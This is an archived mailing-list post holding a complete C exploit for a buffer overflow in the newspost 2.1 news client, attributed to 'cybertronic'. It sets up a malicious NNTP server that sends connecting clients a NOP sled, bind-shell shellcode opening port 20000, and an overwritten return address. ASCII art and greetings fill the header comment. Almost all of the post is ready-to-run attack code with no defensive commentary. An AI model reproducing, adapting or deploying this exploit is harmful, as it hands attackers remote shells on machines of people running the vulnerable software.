<<< Date Index >>>     <<< Thread Index >>>

RE: SECURITEY.NNOV.RU NewsPost buffer overflow [EXPLOIT]




/* 
02/03/2005 
NOTES: -Newspost "socket_getline()" Buffer Overflow 
Exploit 
 
Client Usage 
------------ 
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n 
cyber -s tronic <file> 
 
Greetz fly to my girlfriend YASMIN H. 
 
                                                    ? 
                                                   ?M 
                   M                              
?MMM 
                   MMm                           
?MMMM 
                   M$$MMm                       
?MMMMM. 
                   MM$$MMMMm                   
MMMMMMMM 
                   `MM$$MMMMMMm               4MMMM$
$MM 
                    MMM$$MMMMMMMMm           ?MMMM$
$MMM 
                     MMM$$$MMMMMMMMm         mMMMM
$MMMM 
                      `MMM$$$MMMMMMMm        MMMM
$MMMM? 
                        MMMM$$$MMMMMMMm      MMM$
$MMM? 
                         `MMMMMMMMMMMMMm     MMMMMMM? 
                           `MMMMMMMMMMMMMm   MMMMMM 
                              `MMMMMMMMMMMM  MMMMM 
                                 `MMMMMMMMMM MMMMM 
                                    `MMMMMMMMMMMM 
                                      MMMMMMMMMMM 
                               mmMMMMMMMMMMMMMMMMM 
                           mmMMMMMMMMMMMMMMMMMMMMMM 
                          ?MMM#MMMMMMMMMMMMMMMMMMMMm 
                        4MMM<º >MMMMMMMMMMMMMMMMMMMM 
                       MMMMMm_ mMMMMMMMMMMMMMMMMMMMM 
                      4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                        MMMMMMMMMMMMMMMMMMMMMMMMMMMM 
       ?Mn               ?MMMMMMMMMMMMMMMMMMMMMMMMM            
?Mnn 
       nM                  `MMMMMMMMMMMMMMMMMMMMMM?              
n? 
        `?                    MMMMMMMMMMMMMMMMM?                
n? 
                                     MMMMMM? 
                                    mtr? 
 
 
     mMMM           nmM                         mM 
   mM??  M          ' M                          n 
 mM$                 nM                       n?MMn?Ä 
4M               m   ?M                      N   ?                           
?` 
m?       `n?    mM  NM?                         NM 
mM        mMm  nm   M??MÄ?     n?Mm   ?n  xnÄ,  ?   
?n  xnÄ  ?Mm   Mn n?     nM   nMm 
 mM        `mMM?   nM     M   nM  ,`   ?n?  y   M    
?n?  y nM  ?   nM  Ä    Ä   ? 
  M?         M'    ?Ä      M  n.,?     nm      nM    
nM     n   M   ?   Ä    ?  n 
   MM?  mM   M    nM Ä    M?  n    ,  nM       ?Ä   
nM      M  nM   M   M   M?  M   n 
     MMM?   M?   nM   MÄÄM     n?nN  ?M       nM   ?M       
`?M?   ??  .N  nM    ?nM? 
           M? 
         n?                                              
cybertronic 2oo5 
        ?                                        
________________ 
                                                    ----------------------/ 
 
 
 
                MMMMMMMMm                            
mMMMMMMM? 
             ?MM$MMMMMMMMMm                        
mMMMMMMMMM$MM` 
             MMMMMMMMMMMMMMMm                    
mMMMMMMMMMMMMMMM 
             MMMMMMMMMMMMMMMMMM                
MMMMMMMMMMMMMMMMMM 
             MMMMMMMMMMMMMMMMMMMM            
MMMMMMMMMMMMMMMMMMMM 
               `MMMMMMMMMMMMMMMMMM          
MMMMMMMMMMM(c)MMMM? 
 
                ºÕÍÄúú  just want to say love you 
dad!  úúÄÍÕº 
*/ 
 
#include <stdio.h> 
#include <strings.h> 
#include <signal.h> 
#include <netinet/in.h> 
#include <netdb.h> 
 
#define RED     "\E[31m\E[1m" 
#define GREEN   "\E[32m\E[1m" 
#define YELLOW  "\E[33m\E[1m" 
#define BLUE    "\E[34m\E[1m" 
#define NORMAL  "\E[m" 
 
#define PORT    119 
#define BACKLOG 5 
 
//92 bytes bindcode port 20000 
char scode[] = 
"\x31\xdb"                              // xor     
ebx, ebx 
"\xf7\xe3"                              // mul     
ebx 
"\xb0\x66"                              // mov     
al, 102 
"\x53"                                  // push    
ebx 
"\x43"                                  // inc     
ebx 
"\x53"                                  // push    
ebx 
"\x43"                                  // inc     
ebx 
"\x53"                                  // push    
ebx 
"\x89\xe1"                              // mov     
ecx, esp 
"\x4b"                                  // dec     
ebx 
"\xcd\x80"                              // int     
80h 
"\x89\xc7"                              // mov     
edi, eax 
"\x52"                                  // push    
edx 
"\x66\x68\x4e\x20"                      // push    
word 8270 
"\x43"                                  // inc     
ebx 
"\x66\x53"                              // push    bx 
"\x89\xe1"                              // mov     
ecx, esp 
"\xb0\xef"                              // mov     
al, 239 
"\xf6\xd0"                              // not     al 
"\x50"                                  // push    
eax 
"\x51"                                  // push    
ecx 
"\x57"                                  // push    
edi 
"\x89\xe1"                              // mov     
ecx, esp 
"\xb0\x66"                              // mov     
al, 102 
"\xcd\x80"                              // int     
80h 
"\xb0\x66"                              // mov     
al, 102 
"\x43"                                  // inc     
ebx 
"\x43"                                  // inc     
ebx 
"\xcd\x80"                              // int     
80h 
"\x50"                                  // push    
eax 
"\x50"                                  // push    
eax 
"\x57"                                  // push    
edi 
"\x89\xe1"                              // mov     
ecx, esp 
"\x43"                                  // inc     
ebx 
"\xb0\x66"                              // mov     
al, 102 
"\xcd\x80"                              // int     
80h 
"\x89\xd9"                              // mov     
ecx, ebx 
"\x89\xc3"                              // mov     
ebx, eax 
"\xb0\x3f"                              // mov     
al, 63 
"\x49"                                  // dec     
ecx 
"\xcd\x80"                              // int     
80h 
"\x41"                                  // inc     
ecx 
"\xe2\xf8"                              // loop    lp 
"\x51"                                  // push    
ecx 
"\x68\x6e\x2f\x73\x68"                  // push    
dword 68732f6eh 
"\x68\x2f\x2f\x62\x69"                  // push    
dword 69622f2fh 
"\x89\xe3"                              // mov     
ebx, esp 
"\x51"                                  // push    
ecx 
"\x53"                                  // push    
ebx 
"\x89\xe1"                              // mov     
ecx, esp 
"\xb0\xf4"                              // mov     
al, 244 
"\xf6\xd0"                              // not     al 
"\xcd\x80";                             // int     
80h 
 
void cmd ( int connfd ); 
void header (); 
 
int 
main ( int argc, char* argv[] ) 
{ 
        int listenfd, connfd; 
        pid_t childpid; 
        socklen_t clilen; 
        struct sockaddr_in cliaddr, servaddr; 
 
        header (); 
        printf ( "[*] Creating socket..." ); 
        if ( ( listenfd = socket ( AF_INET, 
SOCK_STREAM, 0 ) ) == -1 ) 
        { 
                printf ( RED "FAILED!\n" NORMAL ); 
                exit ( 1 ); 
        } 
        printf ( GREEN "OK!\n" NORMAL ); 
        bzero ( &servaddr, sizeof ( servaddr ) ); 
        servaddr.sin_family = AF_INET; 
        servaddr.sin_addr.s_addr = htonl 
( INADDR_ANY ); 
        servaddr.sin_port = htons ( PORT ); 
 
        bind ( listenfd, ( struct sockaddr * ) 
&servaddr, sizeof ( servaddr ) ); 
        printf ( "[*] Listening..." ); 
        if ( listen ( listenfd, BACKLOG ) == -1 ) 
        { 
                printf ( RED "FAILED!\n" NORMAL ); 
                exit ( 1 ); 
        } 
        printf ( GREEN "OK!\n" NORMAL ); 
 
        for ( ; ; ) 
        { 
                clilen = sizeof ( cliaddr ); 
 
                if ( ( connfd = accept ( listenfd, 
( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 ) 
                { 
                        close ( listenfd ); 
                        exit ( 1 ); 
                } 
 
                if ( ( childpid = fork ( ) ) == 0 ) 
                { 
                        close ( listenfd ); 
                        printf ( "[*]" GREEN " 
Incomming connection from:\t %s\n" NORMAL, inet_ntoa 
( cliaddr.sin_addr ) ); 
                        cmd ( connfd ); 
                } 
                close ( connfd ); 
        } 
} 
 
void 
cmd ( int s ) 
{ 
        char in[1024], out[1200]; 
        unsigned long ret = 0xbfffecb8; 
 
        bzero ( &out, 1200 ); 
        memset ( out, 0x90, 956 ); //956 
        memcpy ( out + 956, scode, sizeof 
( scode ) ); 
        strcat ( out, "\x41\x41\x41\x41" ); 
        strncat ( out, ( unsigned char* ) &ret, 4 ); 
        printf ( "[*] Sending Bad Packet [ %u 
bytes ]...", strlen ( out ) ); 
        if ( write ( s, out, strlen ( out ) ) <= 0 ) 
        { 
                printf ( RED "FAILED!\n" NORMAL); 
                exit ( 1 ); 
        } 
        printf ( GREEN "OK!\n" NORMAL); 
        sleep ( 1 ); 
} 
 
void 
header () 
{ 
        system ( "clear" ); 
        printf ( RED "### " GREEN "# # " YELLOW "###  
" BLUE "### " RED "###  " GREEN "### " YELLOW "###  " 
BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" 
NORMAL); 
        printf ( RED "#   " GREEN "# # " YELLOW "#  # 
" BLUE "#   " RED "#  # " GREEN " #  " YELLOW "#  # " 
BLUE "# # " RED "##  # " GREEN "# " YELLOW "#  \n" 
NORMAL); 
        printf ( RED "#   " GREEN "# # " YELLOW "###  
" BLUE "### " RED "###  " GREEN " #  " YELLOW "###  " 
BLUE "# # " RED "# # # " GREEN "# " YELLOW "#  \n" 
NORMAL); 
        printf ( RED "#   " GREEN " #  " YELLOW "#  # 
" BLUE "#   " RED "# #  " GREEN " #  " YELLOW "# #  " 
BLUE "# # " RED "#  ## " GREEN "# " YELLOW "#  \n" 
NORMAL); 
        printf ( RED "### " GREEN " #  " YELLOW "###  
" BLUE "### " RED "#  # " GREEN " #  " YELLOW "#  # " 
BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" 
NORMAL); 
        printf ( RED "                
cybertronic@xxxxxxx\n" NORMAL ); 
        printf ( RED "                  ----------(c) 
2005----------\n\n" NORMAL ); 
        printf ( "newspost-2.1\n\n" ); 
}